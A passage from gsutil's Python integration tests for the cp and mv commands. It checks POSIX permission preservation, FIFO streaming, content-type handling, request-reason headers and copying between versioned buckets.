GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
# Move objects one at a time to avoid bucket listing consistency issues.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: True if the calling test suite is cp; False if it is mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
if self._use_gcloud_storage:
self.assertIn('not found: 404', stderr)
else:
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
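# For context (standard POSIX fifo semantics): open() for reading blocks
# until a writer opens the fifo, and vice versa, which is why both ends run
# in their own threads with a join timeout instead of on the main test thread.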
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
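# Context: when use_magicfile is enabled, gsutil delegates content-type
# detection to the `file` command, which classifies the 'foo/bar\n' contents
# as text/plain; otherwise detection falls back to the filename extension,
# and this extensionless temp file defaults to application/octet-stream.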
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
# Ensure the x-goog-request-reason header is set in the cp command.
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
# Ensure the x-goog-request-reason header is set in the ls command.
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
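# resumable_threshold is the size (in bytes) at or above which gsutil uses
# resumable uploads; forcing it to 0 makes even this tiny file take the
# multi-request resumable path, so the reason header must appear on more than
# one request.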
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
if self._use_gcloud_storage:
self.assertIn(
'destination argument of the cp command cannot'
' be a version-specific URL', stderr)
else:
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
